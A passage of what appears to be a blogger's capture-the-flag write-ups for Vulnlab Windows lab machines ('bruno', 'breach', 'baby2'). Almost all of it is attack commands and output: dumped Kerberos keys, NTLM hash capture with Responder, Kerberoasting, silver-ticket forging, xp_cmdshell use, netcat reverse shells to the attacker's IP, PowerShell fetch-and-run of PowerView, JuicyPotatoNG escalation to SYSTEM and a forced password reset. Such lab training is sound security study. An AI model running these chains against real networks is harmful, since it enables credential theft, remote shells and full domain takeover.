bruno.vl\Donna.Harrison:aes256-cts-hmac-sha1-96:144cc36b3f8ef377d047404029a12368456eb09c7b2eec6441024d464af6a024
bruno.vl\Donna.Harrison:aes128-cts-hmac-sha1-96:1770287318457adf814de9048c465c7c
bruno.vl\Donna.Harrison:des-cbc-md5:4c7c855b29a151d3
bruno.vl\Charles.Young:aes256-cts-hmac-sha1-96:317b168352e1221177206391b1a1bc0711650439ca62a09803c15e5fefc7ee6e
bruno.vl\Charles.Young:aes128-cts-hmac-sha1-96:924ebf2f4964cd171dcff85d2da3329a
bruno.vl\Charles.Young:des-cbc-md5:585720310807e5b0
bruno.vl\Graeme.Grant:aes256-cts-hmac-sha1-96:1224cadd3186dfe32b13cf92bd399fc6b8ebd82ae1fc070f2195fdf8c501fbd0
bruno.vl\Graeme.Grant:aes128-cts-hmac-sha1-96:388fde76a02042631fa10b9f32b2c4c9
bruno.vl\Graeme.Grant:des-cbc-md5:cb6d7615a19892c8
bruno.vl\Natalie.Anderson:aes256-cts-hmac-sha1-96:b34fffd92671bba884152777617193cc95a971f63cb38b2bb7dc51a3af0e6bd2
bruno.vl\Natalie.Anderson:aes128-cts-hmac-sha1-96:50454fdeb8dd28d3419a124971173706
bruno.vl\Natalie.Anderson:des-cbc-md5:2085d92cbcbf0d1c
bruno.vl\Sam.Owen:aes256-cts-hmac-sha1-96:b3b51369f137312db8e6069f966c77f76008a32d8d495f16f57fac56e76f10f7
bruno.vl\Sam.Owen:aes128-cts-hmac-sha1-96:0f4fb13e3e763b05d95ac0158cd293eb
bruno.vl\Sam.Owen:des-cbc-md5:d349daefc10dea37
bruno.vl\Jeremy.Singh:aes256-cts-hmac-sha1-96:465a4605922f10445fcfd767775fc59997a63bb6dffcbe6886e8e70a969febc1
bruno.vl\Jeremy.Singh:aes128-cts-hmac-sha1-96:e80e467d2c52415a45365a55fababc47
bruno.vl\Jeremy.Singh:des-cbc-md5:fef23ba22cbcb62f
bruno.vl\Kieran.Day:aes256-cts-hmac-sha1-96:98914ef5df0e8a39eb953a9bbe286dd6861d4e7822311e182be4efcf299872de
bruno.vl\Kieran.Day:aes128-cts-hmac-sha1-96:4c472b9aa96f99c5f35b26ff2ffcaf03
bruno.vl\Kieran.Day:des-cbc-md5:0bd0c752929d5210
bruno.vl\Hugh.Young:aes256-cts-hmac-sha1-96:be216166da5744799c4d1ad6cf67c1b20aa9a0e4f08bd3f98fcc7ea4fff7e120
bruno.vl\Hugh.Young:aes128-cts-hmac-sha1-96:b40a015e3eff27964ef88f703bf9568e
bruno.vl\Hugh.Young:des-cbc-md5:bcf4da80341c19a7
BRUNODC$:aes256-cts-hmac-sha1-96:99b6b10d2ad226d66dbaa8bbbd0dc0008684fcca5750a7cd0494e09cc620368f
BRUNODC$:aes128-cts-hmac-sha1-96:dd5bdb908dd8127684e4d29b28ccd851
BRUNODC$:des-cbc-md5:6152ce8a26163ec2
[*] Cleaning up... 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]

 

Beyond root

*Evil-WinRM* PS C:\windows\system32\tasks> hostname
brunodc
*Evil-WinRM* PS C:\windows\system32\tasks>  Get-MpComputerStatus


AMEngineVersion                  : 0.0.0.0
AMProductVersion                 : 4.18.2203.5
AMRunningMode                    : Not running
AMServiceEnabled                 : False
AMServiceVersion                 : 0.0.0.0
AntispywareEnabled               : False
AntispywareSignatureAge          : 4294967295
AntispywareSignatureLastUpdated  :
AntispywareSignatureVersion      : 0.0.0.0
AntivirusEnabled                 : False
AntivirusSignatureAge            : 4294967295
...            :



*Evil-WinRM* PS C:\windows\system32\tasks> type scanner
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2022-06-29T13:50:49.3977635</Date>
    <Author>BRUNO\administrator</Author>
    <URI>\scanner</URI>
  </RegistrationInfo>
  <Triggers>
    <BootTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <Enabled>true</Enabled>
      <Delay>PT1M</Delay>
    </BootTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>LeastPrivilege</RunLevel>
      <UserId>svc_scan</UserId>
      <LogonType>Password</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\samples\app\SampleScanner.exe</Command>
    </Exec>
  </Actions>
</Task>
*Evil-WinRM* PS C:\windows\system32\tasks> 

 

.

 

vulnlab-breach

vulnlab breach

a Medium Windows machine

tools used : ntlm_theft.py , impacket-getPac , impacket-GetUserSPNs , ldapdomaindump , impacket-mssqlclient , JuicyPotatoNG.exe

.

we  create a bunch of files which will lead to a NTLMv2 hash stealing attack using this tool: https://github.com/Greenwolf/ntlm_theft

python ntlm_theft.py -g all -s 10.10.97.69 -f puckie

.

┌──(puck㉿kali)-[~/vulnlab/breach]
sudo responder -I tun0

                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx


[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::e718:d192:5032:1452]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-88BT76XF41N]
    Responder Domain Name      [FBHG.LOCAL]
    Responder DCE-RPC Port     [49865]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.97.69
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:1fa52157fd1fca3b:2A0E8B36B448C002767DE27807FE3F48:0101000000000000005034B29DB8DA01623247E1694337960000000002000800460042004800470001001E00570049004E002D0038003800420054003700360058004600340031004E0004003400570049004E002D0038003800420054003700360058004600340031004E002E0046004200480047002E004C004F00430041004C000300140046004200480047002E004C004F00430041004C000500140046004200480047002E004C004F00430041004C0007000800005034B29DB8DA010600040002000000080030003000000000000000010000000020000007196E9E493DFA17295C160C4781E2F23F634A0B97A48BF7DEF201FA24F1CE0E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0032002E003100330038000000000000000000
[*] Skipping previously captured hash for BREACH\Julia.Wong

as Julia.Wong

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-getPac -targetUser administrator breach.vl/julia.wong:Computer1       
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

KERB_VALIDATION_INFO 
LogonTime:                      
    dwLowDateTime:                   2560514102 
    dwHighDateTime:                  30942228 
LogoffTime:                     
--snip--

Domain SID: S-1-5-21-2330692793-3312915120-706255856

 0000   10 00 00 00 F5 18 12 7A  3C 36 13 6A 18 C4 BD 3F   .......z<6.j...?
                                                                                                                     

 

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -dc-ip 10.10.97.69 -request 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation 
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 05:43:08.106169  2024-06-07 05:23:44.260778             



$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a497b878287c08cf634ef3530131743b$a6211db7cc5fb5d31bc2338c501b4b7e990dc8cee0c416b2c0d89de679cc95a7ab289f018a43a37c113e2d99b058d51b50ab4fc5c10b3dc54451444f0e129b435d4d7a7302feb22e19e6983fa6493c83ce6910341a4f1e2b6404565a2f272b09b1511faead8cd5e2bfb82ca51b20b8170147af1aa262b62c95f32b8f5e43cedd5a9e76239d33f87be790624c2a2077cf7b2f5a2aecd3d6e9105321a4d150ea3ffbfb4ee7e4a4c9cf45a056ff7df8f6732f08f45d4c5bcfa4f747078ad5ffa29ac4a68950379570e53ddead20f5320635f2b111f39c81e655086451a078db3a0a3159fe2a4289a57ddde3e65b04b3d2942a3d79a95c8a0dca50c5cfe93e52610256c4a069ba51318584e7d0ccbaee4bfeffce4f9aff6b415276f5ee88ebe9623ebeefaf73da42b5239b3fd1b62fa581556d427ec512df3798042a17e062eea1d676be04735fda3d0043705d4f1f9ca87612230b42cad9bfd867f58cba6c26c06332dde93c81f29ddc039ec5a35269a1f003148fac2ffca4a3f7f2b316fcd59401c9b68cabd231aeebb08f41800c9ab7811562eca1c23ac4def78e18af008ce98e8351f1d3afb437f2f325d645e5bfc7177184018cc00e0fed69c375a91887d02e0f4f1e7a025164431f28a922494acca4b4e36d3d6684e7137879d692117b01bd7c27adff6783e887c06a8841f3a8148fbf419805d967a1716693370d5b442bce99756c58bdcdff1f4be584b525cddf4bba0c0e9f82e0f92199b30854306036db6ff868eb5bfe186b30de5afd07837977f3aa462dff42ad1ce63fa743fdbcc267ad45d65adbdd3e30d9f310860a987cbb1aea8ef9eab1f5752a9a3e686c1d3d503fc006e5df3a49c53d2ab3c45e80f78cd5eba2a72530966e1d15d097fb2700150e3eabb451d3cebf1c7abbcc06c02ef06757f59ec2038761610cd6b25ea83ae019f3805fc31ae3cbd9ea9ed193f622b175f2fe2e737e6fed9be29d31f4947a4ec24be9a9f79af713f991ae842010a7079821e76af8ced756f1e2c83370d1940ec99fff26394e01d17cadef7551b053d7b998ca62c1f1f83cd9a3aa6db9eb6dde4a68fe19f2ac49d3efc4f93bebf3f62cf41fa1d1f5c01fa0978a4c1f7c4774482bb4469b00cd59f782ffef40e09cff227614e6c5a807322302be2cc0f4f28492d95a724b561a21884ac94066d8fe8a82ebdf8a51a590b2635a3be34c00170d55815fa286ccdf8ed7c04c0914090ed7e9a39666d5d6533f6b20846b8a398706ec251064d76960f7af521f9a77439585bb2ba2f6397b7bacbdb1ac81bdcd2ee6bbf3c3005923890c538d9c7ba3ccca2984901ed7a696e02a8e1ab6e64aef3f487f1cf118c3714085ac652f9f202e747b501eaa981644639d59bed8d9891fdc407a23faf797239454d948d5290376271e091621b11bd16ee5ecb5cdd80d73a5bf2fdbd60b739c265fd8a4b22e606b86865f3ebffa9c
                                                                                                                     

Getting more users

┌──(puck㉿kali)-[~/vulnlab/breach]
ldapdomaindump breach.vl -u 'breach\Julia.Wong' -p 'Computer1'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
                                                                                                                     
cat domain_users.grep | grep svc 
svc_mssql svc_mssql svc_mssql Domain Users 02/17/22 10:43:07 06/07/24 13:34:45 06/07/24 13:34:45 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 02/17/22 10:43:08 S-1-5-21-2330692793-3312915120-706255856-1115

bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -c all -ns 10.10.97.69 

Silver ticket create with the NTLM hash of the svc_mysql user:

In order to perform a silver ticket attack we require the Domain SID , User NTLM hash & User SPN

┌──(puck㉿kali)-[~/vulnlab/breach]
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4 
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c


impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache
                                                                                                                     
export KRB5CCNAME=administrator.ccache

.

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-mssqlclient -k breachdc.breach.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)> 

.

 

SQL stuff

SQL (BREACH\Administrator  dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> sp_configure 'xp_cmdshell', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\"
output                                                       
----------------------------------------------------------   
 Volume in drive C has no label.                             

 Volume Serial Number is B465-02B6                           

NULL                                                         

 Directory of C:\                                            

NULL                                                         

08/19/2021  06:24 AM    <DIR>          EFI                   

02/17/2022  09:55 AM    <DIR>          inetpub               

05/08/2021  08:20 AM    <DIR>          PerfLogs              

02/17/2022  10:28 AM    <DIR>          Program Files         

02/17/2022  10:27 AM    <DIR>          Program Files (x86)   

02/17/2022  02:11 PM    <DIR>          share                 

02/17/2022  01:12 PM    <DIR>          Users                 

02/17/2022  03:35 PM    <DIR>          Windows               

               0 File(s)              0 bytes                

               8 Dir(s)  11,722,678,272 bytes free           

NULL                                                       

                         

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.2.138:8000/nc64.exe -o C:\Temp\nc64.exe"
output   
------   
NULL     

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\Temp"
output                                               
--------------------------------------------------   
 Volume in drive C has no label.                     

 Volume Serial Number is B465-02B6                   

NULL                                                 

 Directory of C:\Temp                                

NULL                                                 

06/07/2024  10:34 AM    <DIR>          .             

06/07/2024  10:34 AM            45,272 nc64.exe      

               1 File(s)         45,272 bytes        

               1 Dir(s)  11,754,811,392 bytes free   

NULL                                                 

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.2.138 4444"


 

 

.

 

Privesc with JuicyPotatoNG

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nc -nlvp 4444 
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 59869
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
breach\svc_mssql

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name        SID                                          
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner    
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Temp> wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Temp> dir
dir

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/7/2024  11:08 AM         153600 JuicyPotatoNG.exe                                                    
-a----          6/7/2024  10:34 AM          45272 nc64.exe                                                             


PS C:\Temp> .\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
.\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
PS C:\Temp>

.

┌──(puck㉿kali)-[~/vulnlab/breach]
rlwrap nc -nlvp 445
listening on [any] 445 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 64454
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>hostname
hostname
BREACHDC


 

.

 

 

vulnlab – baby2

Baby2 is an medium Windows machine on Vulnlab

https://wiki.vulnlab.com/intro/lab-access

Tools used : kerbrute_linux , crackmapexec , responder , smbclient , bloodhound-python , pygpoabuse.py , evil-winrm , impacket-secretsdump

After the nmap scan, we add to our /etc/hosts

110.10.107.115 dc.baby2.vl baby2.vl

SMB enumeration

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ ./kerbrute_linux_386 userenum -d baby2.vl --dc 10.10.107.115 ./users.txt -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/05/24 - Ronnie Flathers @ropnop

2024/06/05 10:51:32 >  Using KDC(s):
2024/06/05 10:51:32 >  	10.10.107.115:88

2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Joan.Jennings@baby2.vl
2024/06/05 10:51:32 >  [!] library        @baby2.vl - User does not exist
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Mohammed.Harris@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Kieran.Mitchell@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Harry.Shaw@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Amelia.Griffiths@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Carl.Moore@baby2.vl
2024/06/05 10:51:32 >  [!] Joel.Hurst   @baby2.vl - User does not exist
2024/06/05 10:51:32 >  [!] Nicola.Lamb    @baby2.vl - User does not exist
2024/06/05 10:51:32 >  [!] Lynda.Bailey   @baby2.vl - User does not exist
2024/06/05 10:51:33 >  [+] VALID USERNAME:	 Ryan.Jenkins@baby2.vl
2024/06/05 10:51:33 >  Done! Tested 11 usernames (7 valid) in 0.046 seconds

.

 

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ crackmapexec smb baby2.vl -u 'users.txt' -p 'users.txt'  --no-bruteforce --continue-on-success
SMB         dc.baby2.vl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Amelia.Griffiths:Amelia.Griffiths STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Harry.Shaw:Harry.Shaw STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Joan.Jennings:Joan.Jennings STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Joel.Hurst:Joel.Hurst STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Kieran.Mitchell:Kieran.Mitchell STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [+] baby2.vl\library:library 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Lynda.Bailey:Lynda.Bailey STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Mohammed.Harris:Mohammed.Harris STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Nicola.Lamb:Nicola.Lamb STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Ryan.Jenkins:Ryan.Jenkins STATUS_LOGON_FAILURE 

.

                                                                    
┌──(puck㉿kali)-[~/vulnlab/baby2]
sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

--snip--

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::649e:d175:8068:bcd1]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-4JOEGPTIY13]
    Responder Domain Name      [VHTD.LOCAL]
    Responder DCE-RPC Port     [45034]

[+] Listening for events...

[SMB] NTLMv1-SSP Client   : 10.10.107.115
[SMB] NTLMv1-SSP Username : BABY2\Amelia.Griffiths
[SMB] NTLMv1-SSP Hash     : Amelia.Griffiths::BABY2:209A2B76B00AD43400000000000000000000000000000000:3396018DE3FBCDC60DDC06D5C83119BA2C907D2EE4041103:fe87a8a485cea873
[*] Skipping previously captured hash for BABY2\Amelia.Griffiths
[*] Skipping previously captured hash for BABY2\Amelia.Griffiths
[*] Skipping previously captured hash for BABY2\Amelia.Griffiths

.

Download login.vbs, modify it to below and then upload it

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ smbclient //baby2.vl/SYSVOL -U Carl.Moore
Password for [WORKGROUP\Carl.Moore]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 22 19:37:36 2023
  ..                                  D        0  Tue Aug 22 19:37:36 2023
  baby2.vl                           Dr        0  Tue Aug 22 19:37:36 2023

        6126847 blocks of size 4096. 1960515 blocks available
smb: \> cd baby2.vl
smb: \baby2.vl\> ls
  .                                   D        0  Tue Aug 22 19:43:55 2023
  ..                                  D        0  Tue Aug 22 19:37:36 2023
  DfsrPrivate                      DHSr        0  Tue Aug 22 19:43:55 2023
  Policies                            D        0  Tue Aug 22 19:37:41 2023
  scripts                             D        0  Tue Aug 22 21:28:27 2023

        6126847 blocks of size 4096. 1960512 blocks available
smb: \baby2.vl\> cd scripts
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Tue Aug 22 21:28:27 2023
  ..                                  D        0  Tue Aug 22 19:43:55 2023
  login.vbs                           A      992  Sat Sep  2 16:55:51 2023

        6126847 blocks of size 4096. 1960216 blocks available
smb: \baby2.vl\scripts\> get login.vbs
getting file \baby2.vl\scripts\login.vbs of size 992 as login.vbs (6.5 KiloBytes/sec) (average 6.5 KiloBytes/sec)
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Tue Aug 22 21:28:27 2023
  ..                                  D        0  Tue Aug 22 19:43:55 2023
  login.vbs                           A      992  Sat Sep  2 16:55:51 2023

        6126847 blocks of size 4096. 1980334 blocks available
smb: \baby2.vl\scripts\> put login.vbs
putting file login.vbs as \baby2.vl\scripts\login.vbs (19.4 kb/s) (average 19.4 kb/s)
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Tue Aug 22 21:28:27 2023
  ..                                  D        0  Tue Aug 22 19:43:55 2023
  login.vbs                           A     1190  Thu Jun  6 10:42:19 2024

        6126847 blocks of size 4096. 1980332 blocks available
smb: \baby2.vl\scripts\>

.

.

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ bloodhound-python -d 'baby2.vl' -u 'library' -p 'library' -c all -ns 10.10.97.10 
INFO: Found AD domain: baby2.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.baby2.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.baby2.vl
INFO: Found 16 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.baby2.vl
INFO: Done in 00M 06S

.

Catch the shell

──(puck㉿kali)-[~/vulnlab/baby2]
└─$ python3 -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.121.13 - - [06/Jun/2024 10:42:58] "GET /Invoke-ConPtyShell.ps1 HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:53:49] "GET /nc.exe HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:53:49] "GET /nc.exe HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:54:49] "GET /nc.exe HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:54:49] "GET /nc.exe HTTP/1.1" 200 -

.

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.121.13] 54867
Microsoft Windows [Version 10.0.20348.1906]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
baby2\amelia.griffiths

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E6F3-2485

 Directory of c:\temp

06/06/2024  01:53 AM    <DIR>          .
06/06/2024  01:53 AM            45,272 nc.exe
               1 File(s)         45,272 bytes
               1 Dir(s)   8,262,537,216 bytes free

c:\temp>powershell                                                     
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> iex (iwr -usebasicparsing http://10.8.2.138:8000/PowerView.ps1)

PS C:\temp> add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"

PS C:\temp> $cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

PS C:\temp> set-domainuserpassword gpoadm -accountpassword $cred

PS C:\temp> 

Check if o.k.

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ crackmapexec smb baby2.vl -u 'gpoadm' -p 'Password123!'  --no-bruteforce --continue-on-success 
SMB         dc.baby2.vl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         dc.baby2.vl     445    DC               [+] baby2.vl\gpoadm:Password123! 
                                                                                
┌──(puck㉿kali)-[~/vulnlab/baby2]

.

